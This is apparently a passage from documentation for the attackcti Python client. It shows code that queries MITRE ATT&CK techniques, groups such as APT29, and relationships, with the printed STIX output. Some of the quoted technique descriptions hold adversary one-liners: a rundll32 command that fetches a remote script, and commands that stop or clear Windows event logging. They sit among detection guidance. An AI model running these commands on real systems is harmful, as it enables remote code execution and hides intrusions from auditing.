Filtering and Looking Up STIX Objects in ATT&CK
Contents
Filtering and Looking Up STIX Objects in ATT&CK#
Import ATTACK API Client#
from attackcti import attack_client
Import Extra Libraries#
from pandas import *
import logging
logging.getLogger('taxii2client').setLevel(logging.CRITICAL)
Initialize ATT&CK Client Variable#
lift = attack_client()
Get Technique by Name (TAXII)#
You can use a custom method in the attack_client class to get a technique across all the matrices by its name. It is case sensitive.
technique_name = lift.get_technique_by_name('Rundll32')
technique_name
[AttackPattern(type='attack-pattern', id='attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2020-01-23T18:03:46.248Z', modified='2021-10-14T21:45:53.057Z', name='Rundll32', description='Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: <code>rundll32.exe {DLLname, DLLfunction}</code>).\n\nRundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"</code> This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)\n\nAdversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command <code>rundll32.exe ExampleDLL.dll, ExampleFunction</code>, rundll32.exe would first attempt to execute <code>ExampleFunctionW</code>, or failing that <code>ExampleFunctionA</code>, before loading <code>ExampleFunction</code>). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending <code>W</code> and/or <code>A</code> to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll)', kill_chain_phases=[KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')], revoked=False, external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/techniques/T1218/011', external_id='T1218.011'), ExternalReference(source_name='Trend Micro CPL', description='Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017.', url='https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf'), ExternalReference(source_name='This is Security Command Line Confusion', description='B. Ancel. (2014, August 20). Poweliks – Command Line Confusion. Retrieved March 5, 2018.', url='https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/'), ExternalReference(source_name='Attackify Rundll32.exe Obscurity', description='Attackify. (n.d.). Rundll32.exe Obscurity. Retrieved August 23, 2021.', url='https://www.attackify.com/blog/rundll32_execution_order/'), ExternalReference(source_name='Github NoRunDll', description='gtworek. (2019, December 17). NoRunDll. Retrieved August 23, 2021.', url='https://github.com/gtworek/PSBits/tree/master/NoRunDll')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_contributors=['Gareth Phillips, Seek Ltd.', 'Casey Smith', 'Ricardo Dias'], x_mitre_data_sources=['File: File Metadata', 'Process: Process Creation', 'Command: Command Execution', 'Module: Module Load'], x_mitre_defense_bypassed=['Digital Certificate Validation', 'Application control', 'Anti-virus'], x_mitre_detection='Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity.\n\nCommand arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded. Analyzing DLL exports and comparing to runtime arguments may be useful in uncovering obfuscated function calls.', x_mitre_is_subtechnique=True, x_mitre_permissions_required=['User'], x_mitre_platforms=['Windows'], x_mitre_version='1.1'),
AttackPattern(type='attack-pattern', id='attack-pattern--62b8c999-dcc0-4755-bd69-09442d9359f5', created='2017-05-31T21:31:06.045Z', modified='2020-01-31T19:01:41.919Z', name='Rundll32', revoked=True, external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/techniques/T1085', external_id='T1085'), ExternalReference(source_name='Trend Micro CPL', description='Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017.', url='https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf'), ExternalReference(source_name='This is Security Command Line Confusion', description='B. Ancel. (2014, August 20). Poweliks – Command Line Confusion. Retrieved March 5, 2018.', url='https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/')])]
Get Data Sources from All Techniques (TAXII)#
You can also get all the data sources available in ATT&CK
Currently the only techniques with data sources are the ones in Enterprise ATT&CK.
data_sources = lift.get_data_sources()
len(data_sources)
38
for ds in data_sources:
print(ds['name'])
Internet Scan
Certificate
Domain Name
Volume
Group
Cluster
Logon Session
Network Share
Container
Active Directory
Driver
Instance
Network Traffic
File
Firewall
Persona
Cloud Service
Named Pipe
Service
Windows Registry
Command
Snapshot
Module
Sensor Health
Application Log
Script
Cloud Storage
Drive
Kernel
Pod
Process
Scheduled Job
Web Credential
Malware Repository
User Account
WMI
Image
Firmware
Get Any STIX Object by ID (TAXII)#
You can get any STIX object by its id across all the matrices. It is case sensitive.
You can use the following STIX Object Types:
attack-pattern > techniques
course-of-action > mitigations
intrusion-set > groups
malware
tool
object_by_id = lift.get_object_by_attack_id('attack-pattern', 'T1103')
object_by_id
[AttackPattern(type='attack-pattern', id='attack-pattern--317fefa6-46c7-4062-adb6-2008cf6bcb41', created='2017-05-31T21:31:15.409Z', modified='2020-11-10T18:29:30.379Z', name='AppInit DLLs', revoked=True, external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/techniques/T1103', external_id='T1103'), ExternalReference(source_name='Elastic Process Injection July 2017', description='Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.', url='https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process'), ExternalReference(source_name='AppInit Registry', description='Microsoft. (2006, October). Working with the AppInit_DLLs registry value. Retrieved July 15, 2015.', url='https://support.microsoft.com/en-us/kb/197571'), ExternalReference(source_name='AppInit Secure Boot', description='Microsoft. (n.d.). AppInit DLLs and Secure Boot. Retrieved July 15, 2015.', url='https://msdn.microsoft.com/en-us/library/dn280412'), ExternalReference(source_name='TechNet Autoruns', description='Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.', url='https://technet.microsoft.com/en-us/sysinternals/bb963902')])]
Get Any Group by Alias (TAXII)#
You can get any Group by its Alias property across all the matrices. It is case sensitive.
group_name = lift.get_group_by_alias('Cozy Bear')
group_name
[IntrusionSet(type='intrusion-set', id='intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2017-05-31T21:31:52.748Z', modified='2021-10-16T00:59:58.792Z', name='APT29', description="[APT29](https://attack.mitre.org/groups/G0016) is threat group that has been attributed to Russia's Foreign Intelligence Service (SVR).(Citation: White House Imposing Costs RU Gov April 2021)(Citation: UK Gov Malign RIS Activity April 2021) They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. [APT29](https://attack.mitre.org/groups/G0016) reportedly compromised the Democratic National Committee starting in the summer of 2015.(Citation: F-Secure The Dukes)(Citation: GRIZZLY STEPPE JAR)(Citation: Crowdstrike DNC June 2016)(Citation: UK Gov UK Exposes Russia SolarWinds April 2021)\n\nIn April 2021, the US and UK governments attributed the SolarWinds supply chain compromise cyber operation to the SVR; public statements included citations to [APT29](https://attack.mitre.org/groups/G0016), Cozy Bear, and The Dukes.(Citation: NSA Joint Advisory SVR SolarWinds April 2021)(Citation: UK NSCS Russia SolarWinds April 2021) Victims of this campaign included government, consulting, technology, telecom, and other organizations in North America, Europe, Asia, and the Middle East. Industry reporting referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, and Dark Halo.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: MSTIC NOBELIUM Mar 2021)(Citation: CrowdStrike SUNSPOT Implant January 2021)(Citation: Volexity SolarWinds)(Citation: Cybersecurity Advisory SVR TTP May 2021)", aliases=['APT29', 'NobleBaron', 'Dark Halo', 'StellarParticle', 'NOBELIUM', 'UNC2452', 'YTTRIUM', 'The Dukes', 'Cozy Bear', 'CozyDuke'], revoked=False, external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/groups/G0016', external_id='G0016'), ExternalReference(source_name='APT29', description='(Citation: F-Secure The Dukes)(Citation: FireEye APT29 Nov 2018)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021)'), ExternalReference(source_name='NobleBaron', description='(Citation: SentinelOne NobleBaron June 2021)'), ExternalReference(source_name='Dark Halo', description='(Citation: Volexity SolarWinds)'), ExternalReference(source_name='StellarParticle', description='(Citation: CrowdStrike SUNSPOT Implant January 2021)'), ExternalReference(source_name='NOBELIUM', description='(Citation: MSTIC NOBELIUM Mar 2021)(Citation: MSTIC NOBELIUM May 2021)(Citation: MSTIC Nobelium Toolset May 2021)(Citation: MSRC Nobelium June 2021)'), ExternalReference(source_name='UNC2452', description='(Citation: FireEye SUNBURST Backdoor December 2020)'), ExternalReference(source_name='YTTRIUM', description='(Citation: Microsoft Unidentified Dec 2018)'), ExternalReference(source_name='The Dukes', description='(Citation: F-Secure The Dukes)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021)'), ExternalReference(source_name='Cozy Bear', description='(Citation: Crowdstrike DNC June 2016)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021)'), ExternalReference(source_name='CozyDuke', description='(Citation: Crowdstrike DNC June 2016)'), ExternalReference(source_name='White House Imposing Costs RU Gov April 2021', description='White House. (2021, April 15). Imposing Costs for Harmful Foreign Activities by the Russian Government. Retrieved April 16, 2021.', url='https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/'), ExternalReference(source_name='UK Gov Malign RIS Activity April 2021', description='UK Gov. (2021, April 15). UK and US expose global campaign of malign activity by Russian intelligence services . Retrieved April 16, 2021.', url='https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services'), ExternalReference(source_name='F-Secure The Dukes', description='F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.', url='https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf'), ExternalReference(source_name='GRIZZLY STEPPE JAR', description='Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017.', url='https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf'), ExternalReference(source_name='Crowdstrike DNC June 2016', description='Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.', url='https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/'), ExternalReference(source_name='UK Gov UK Exposes Russia SolarWinds April 2021', description='UK Gov. (2021, April 15). UK exposes Russian involvement in SolarWinds cyber compromise . Retrieved April 16, 2021.', url='https://www.gov.uk/government/news/russia-uk-exposes-russian-involvement-in-solarwinds-cyber-compromise'), ExternalReference(source_name='NSA Joint Advisory SVR SolarWinds April 2021', description='NSA, FBI, DHS. (2021, April 15). Russian SVR Targets U.S. and Allied Networks. Retrieved April 16, 2021.', url='https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF'), ExternalReference(source_name='UK NSCS Russia SolarWinds April 2021', description='UK NCSC. (2021, April 15). UK and US call out Russia for SolarWinds compromise. Retrieved April 16, 2021.', url='https://www.ncsc.gov.uk/news/uk-and-us-call-out-russia-for-solarwinds-compromise'), ExternalReference(source_name='FireEye SUNBURST Backdoor December 2020', description='FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021.', url='https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html'), ExternalReference(source_name='MSTIC NOBELIUM Mar 2021', description='Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021.', url='https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/'), ExternalReference(source_name='CrowdStrike SUNSPOT Implant January 2021', description='CrowdStrike Intelligence Team. (2021, January 11). SUNSPOT: An Implant in the Build Process. Retrieved January 11, 2021.', url='https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/'), ExternalReference(source_name='Volexity SolarWinds', description='Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020.', url='https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/'), ExternalReference(source_name='Cybersecurity Advisory SVR TTP May 2021', description='NCSC, CISA, FBI, NSA. (2021, May 7). Further TTPs associated with SVR cyber actors. Retrieved July 29, 2021.', url='https://www.ncsc.gov.uk/files/Advisory-further-TTPs-associated-with-SVR-cyber-actors.pdf'), ExternalReference(source_name='FireEye APT29 Nov 2018', description='Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018.', url='https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html'), ExternalReference(source_name='ESET Dukes October 2019', description='Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020.', url='https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf'), ExternalReference(source_name='NCSC APT29 July 2020', description='National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020.', url='https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf'), ExternalReference(source_name='SentinelOne NobleBaron June 2021', description='Guerrero-Saade, J. (2021, June 1). NobleBaron | New Poisoned Installers Could Be Used In Supply Chain Attacks. Retrieved August 4, 2021.', url='https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/'), ExternalReference(source_name='MSTIC NOBELIUM May 2021', description='Microsoft Threat Intelligence Center (MSTIC). (2021, May 27). New sophisticated email-based attack from NOBELIUM. Retrieved May 28, 2021.', url='https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/'), ExternalReference(source_name='MSTIC Nobelium Toolset May 2021', description='MSTIC. (2021, May 28). Breaking down NOBELIUM’s latest early-stage toolset. Retrieved August 4, 2021.', url='https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/'), ExternalReference(source_name='MSRC Nobelium June 2021', description='MSRC. (2021, June 25). New Nobelium activity. Retrieved August 4, 2021.', url='https://msrc-blog.microsoft.com/2021/06/25/new-nobelium-activity/'), ExternalReference(source_name='Microsoft Unidentified Dec 2018', description='Microsoft Defender Research Team. (2018, December 3). Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers. Retrieved April 15, 2019.', url='https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_contributors=['Daniyal Naeem, BT Security', 'Matt Brenton, Zurich Insurance Group', 'Katie Nickels, Red Canary'], x_mitre_version='2.1')]
Get Relationships by Any Object (TAXII)#
You can get available relationships defined in ATT&CK of type uses and mitigates for specific objects across all the matrices.
groups = lift.get_groups()
one_group = groups[0]
relationships = lift.get_relationships_by_object(one_group)
relationships[0]
Relationship(type='relationship', id='relationship--6bbd0299-4e8b-4d31-83c4-c690e43294c0', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2021-10-15T18:47:18.472Z', modified='2021-10-15T18:47:18.472Z', relationship_type='uses', description='[TeamTNT](https://attack.mitre.org/groups/G0139) has searched for unsecured SSH keys.(Citation: Cado Security TeamTNT Worm August 2020)(Citation: Trend Micro TeamTNT)', source_ref='intrusion-set--35d1b3be-49d4-42f1-aaa6-ef159c880bca', target_ref='attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf', revoked=False, external_references=[ExternalReference(source_name='Cado Security TeamTNT Worm August 2020', description='Cado Security. (2020, August 16). Team TNT – The First Crypto-Mining Worm to Steal AWS Credentials. Retrieved September 22, 2021.', url='https://www.cadosecurity.com/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials/'), ExternalReference(source_name='Trend Micro TeamTNT', description='Fiser, D. Oliveira, A. (n.d.). Tracking the Activities of TeamTNT A Closer Look at a Cloud-Focused Malicious Actor Group. Retrieved September 22, 2021.', url='https://documents.trendmicro.com/assets/white_papers/wp-tracking-the-activities-of-teamTNT.pdf')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'])
Get All Techniques with Mitigations (TAXII)#
The difference with this function and get_techniques() is that get_techniques_mitigated_by_mitigation returns techniques that have mitigations mapped to them.
techniques_mitigated = lift.get_techniques_mitigated_by_mitigations()
len(techniques_mitigated)
661
techniques_mitigated[0]
AttackPattern(type='attack-pattern', id='attack-pattern--b22e5153-ac28-4cc6-865c-2054e36285cb', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2021-10-12T20:02:31.866Z', modified='2021-10-16T01:50:40.276Z', name='Resource Forking', description='Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using <code>ls -l@</code> or <code>xattr -l</code> commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the <code>/Resources</code> folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)\n\nAdversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)', kill_chain_phases=[KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')], revoked=False, external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/techniques/T1564/009', external_id='T1564.009'), ExternalReference(source_name='macOS Hierarchical File System Overview', description='Tenon. (n.d.). Retrieved October 12, 2021.', url='http://tenon.com/products/codebuilder/User_Guide/6_File_Systems.html#anchor520553'), ExternalReference(source_name='Resource and Data Forks', description='Flylib. (n.d.). Identifying Resource and Data Forks. Retrieved October 12, 2021.', url='https://flylib.com/books/en/4.395.1.192/1/'), ExternalReference(source_name='ELC Extended Attributes', description="Howard Oakley. (2020, October 24). There's more to files than data: Extended Attributes. Retrieved October 12, 2021.", url='https://eclecticlight.co/2020/10/24/theres-more-to-files-than-data-extended-attributes/'), ExternalReference(source_name='sentinellabs resource named fork 2020', description='Phil Stokes. (2020, November 5). Resourceful macOS Malware Hides in Named Fork. Retrieved October 12, 2021.', url='https://www.sentinelone.com/labs/resourceful-macos-malware-hides-in-named-fork/'), ExternalReference(source_name='tau bundlore erika noerenberg 2020', description='Erika Noerenberg. (2020, June 29). TAU Threat Analysis: Bundlore (macOS) mm-install-macos. Retrieved October 12, 2021.', url='https://blogs.vmware.com/security/2020/06/tau-threat-analysis-bundlore-macos-mm-install-macos.html')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_contributors=['Jaron Bradley @jbradley89', 'Ivan Sinyakov'], x_mitre_data_sources=['File: File Creation', 'Process: Process Creation', 'File: File Metadata', 'Command: Command Execution'], x_mitre_defense_bypassed=['Notarization; Gatekeeper'], x_mitre_detection='Identify files with the <code>com.apple.ResourceFork</code> extended attribute and large data amounts stored in resource forks. \n\nMonitor command-line activity leveraging the use of resource forks, especially those immediately followed by potentially malicious activity such as creating network connections. ', x_mitre_is_subtechnique=True, x_mitre_permissions_required=['User'], x_mitre_platforms=['macOS'], x_mitre_version='1.0')
Get Techniques Used by Software (TAXII)#
This the function returns information about a specific software STIX object.
all_software = lift.get_software()
one_software = all_software[0]
software_techniques = lift.get_techniques_used_by_software(one_software)
software_techniques[0]
AttackPattern(type='attack-pattern', id='attack-pattern--4eb28bed-d11a-4641-9863-c2ac017d910a', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2020-02-21T20:46:36.688Z', modified='2021-10-19T13:37:30.534Z', name='Disable Windows Event Logging', description='Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections.\n\nThe EventLog service maintains event logs from various system components and applications.(Citation: EventLog_Core_Technologies) By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to <code>Security Settings\\Local Policies\\Audit Policy</code> for basic audit policy settings or <code>Security Settings\\Advanced Audit Policy Configuration</code> for advanced audit policy settings.(Citation: Audit_Policy_Microsoft)(Citation: Advanced_sec_audit_policy_settings) <code>auditpol.exe</code> may also be used to set audit policies.(Citation: auditpol)\n\nAdversaries may target system-wide logging or just that of a particular application. For example, the EventLog service may be disabled using the following PowerShell line: <code>Stop-Service -Name EventLog</code>.(Citation: Disable_Win_Event_Logging) Additionally, adversaries may use <code>auditpol</code> and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the <code>/success</code> or <code>/failure</code> parameters. For example, <code>auditpol /set /category:”Account Logon” /success:disable /failure:disable</code> turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: <code>auditpol /clear /y</code> or <code>auditpol /remove /allusers</code>.(Citation: T1562.002_redcanaryco)\n\nBy disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.', kill_chain_phases=[KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')], revoked=False, external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/techniques/T1562/002', external_id='T1562.002'), ExternalReference(source_name='Windows Log Events', description='Franklin Smith. (n.d.). Windows Security Log Events. Retrieved February 21, 2020.', url='https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/'), ExternalReference(source_name='EventLog_Core_Technologies', description='Core Technologies. (2021, May 24). Essential Windows Services: EventLog / Windows Event Log. Retrieved September 14, 2021.', url='https://www.coretechnologies.com/blog/windows-services/eventlog/'), ExternalReference(source_name='Audit_Policy_Microsoft', description='Daniel Simpson. (2017, April 19). Audit Policy. Retrieved September 13, 2021.', url='https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/audit-policy'), ExternalReference(source_name='Advanced_sec_audit_policy_settings', description='Simpson, D. et al. (2017, April 19). Advanced security audit policy settings. Retrieved September 14, 2021.', url='https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/advanced-security-audit-policy-settings'), ExternalReference(source_name='auditpol', description='Jason Gerend, et al. (2017, October 16). auditpol. Retrieved September 1, 2021.', url='https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol'), ExternalReference(source_name='Disable_Win_Event_Logging', description=' dmcxblue. (n.d.). Disable Windows Event Logging. Retrieved September 10, 2021.', url='https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/defense-evasion/t1562-impair-defenses/disable-windows-event-logging'), ExternalReference(source_name='auditpol.exe_STRONTIC', description='STRONTIC. (n.d.). auditpol.exe. Retrieved September 9, 2021.', url='https://strontic.github.io/xcyclopedia/library/auditpol.exe-214E0EA1F7F7C27C82D23F183F9D23F1.html'), ExternalReference(source_name='T1562.002_redcanaryco', description='redcanaryco. (2021, September 3). T1562.002 - Disable Windows Event Logging. Retrieved September 13, 2021.', url='https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md'), ExternalReference(source_name='def_ev_win_event_logging', description='Chandel, R. (2021, April 22). Defense Evasion: Windows Event Logging (T1562.002). Retrieved September 14, 2021.', url='https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/'), ExternalReference(source_name='evt_log_tampering', description='svch0st. (2020, September 30). Event Log Tampering Part 1: Disrupting the EventLog Service. Retrieved September 14, 2021.', url='https://svch0st.medium.com/event-log-tampering-part-1-disrupting-the-eventlog-service-8d4b7d67335c')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_contributors=['Prasanth Sadanala, Cigna Information Protection (CIP) - Threat Response Engineering Team'], x_mitre_data_sources=['Process: Process Creation', 'Script: Script Execution', 'Windows Registry: Windows Registry Key Creation', 'Application Log: Application Log Content', 'Sensor Health: Host Status', 'Command: Command Execution'], x_mitre_defense_bypassed=['Log analysis'], x_mitre_detection='Monitor processes and command-line arguments for commands that can be used to disable logging. For example, [Wevtutil](https://attack.mitre.org/software/S0645), `auditpol`, `sc stop EventLog`, and offensive tooling (such as [Mimikatz](https://attack.mitre.org/software/S0002) and `Invoke-Phant0m`) may be used to clear logs.(Citation: def_ev_win_event_logging)(Citation: evt_log_tampering) \n\nIn Event Viewer, Event ID 1102 under the “Security” Windows Log and Event ID 104 under the “System” Windows Log both indicate logs have been cleared.(Citation: def_ev_win_event_logging) `Service Control Manager Event ID 7035` in Event Viewer may indicate the termination of the EventLog service.(Citation: evt_log_tampering) Additionally, gaps in the logs, e.g. non-sequential Event Record IDs, may indicate that the logs may have been tampered.\n\nMonitor the addition of the MiniNT registry key in `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control`, which may disable Event Viewer.(Citation: def_ev_win_event_logging)', x_mitre_is_subtechnique=True, x_mitre_permissions_required=['Administrator'], x_mitre_platforms=['Windows'], x_mitre_version='1.1')
Get Techniques Used by Group (TAXII)#
If you do not provide the name of a specific Group (Case Sensitive), the function returns information about all the groups available across all the matrices.
groups = lift.get_groups()
one_group = groups[0]
group_techniques = lift.get_techniques_used_by_group(one_group)
group_techniques[0]
AttackPattern(type='attack-pattern', id='attack-pattern--0470e792-32f8-46b0-a351-652bc35e9336', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2021-03-31T14:26:00.848Z', modified='2021-04-12T18:22:05.737Z', name='Container and Resource Discovery', description='Adversaries may attempt to discover containers and other resources that are available within a containers environment. Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster.\n\nThese resources can be viewed within web applications such as the Kubernetes dashboard or can be queried via the Docker and Kubernetes APIs.(Citation: Docker API)(Citation: Kubernetes API) In Docker, logs may leak information about the environment, such as the environment’s configuration, which services are available, and what cloud provider the victim may be utilizing. The discovery of these resources may inform an adversary’s next steps in the environment, such as how to perform lateral movement and which methods to utilize for execution. ', kill_chain_phases=[KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')], revoked=False, external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/techniques/T1613', external_id='T1613'), ExternalReference(source_name='Docker API', description='Docker. (n.d.). Docker Engine API v1.41 Reference. Retrieved March 31, 2021.', url='https://docs.docker.com/engine/api/v1.41/'), ExternalReference(source_name='Kubernetes API', description='The Kubernetes Authors. (n.d.). The Kubernetes API. Retrieved March 29, 2021.', url='https://kubernetes.io/docs/concepts/overview/kubernetes-api/')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_contributors=['Vishwas Manral, McAfee', 'Center for Threat-Informed Defense (CTID)', 'Yossi Weizman, Azure Defender Research Team'], x_mitre_data_sources=['Cluster: Cluster Metadata', 'Container: Container Enumeration', 'Container: Container Metadata', 'Pod: Pod Enumeration', 'Pod: Pod Metadata', 'Application Log: Application Log Content'], x_mitre_detection='Establish centralized logging for the activity of container and Kubernetes cluster components. This can be done by deploying logging agents on Kubernetes nodes and retrieving logs from sidecar proxies for application pods to detect malicious activity at the cluster level.\n\nMonitor logs for actions that could be taken to gather information about container infrastructure, including the use of discovery API calls by new or unexpected users. Monitor account activity logs to see actions performed and activity associated with the Kubernetes dashboard and other web applications. ', x_mitre_is_subtechnique=False, x_mitre_permissions_required=['User'], x_mitre_platforms=['Containers'], x_mitre_version='1.0')
Get Software Used by Group (TAXII)#
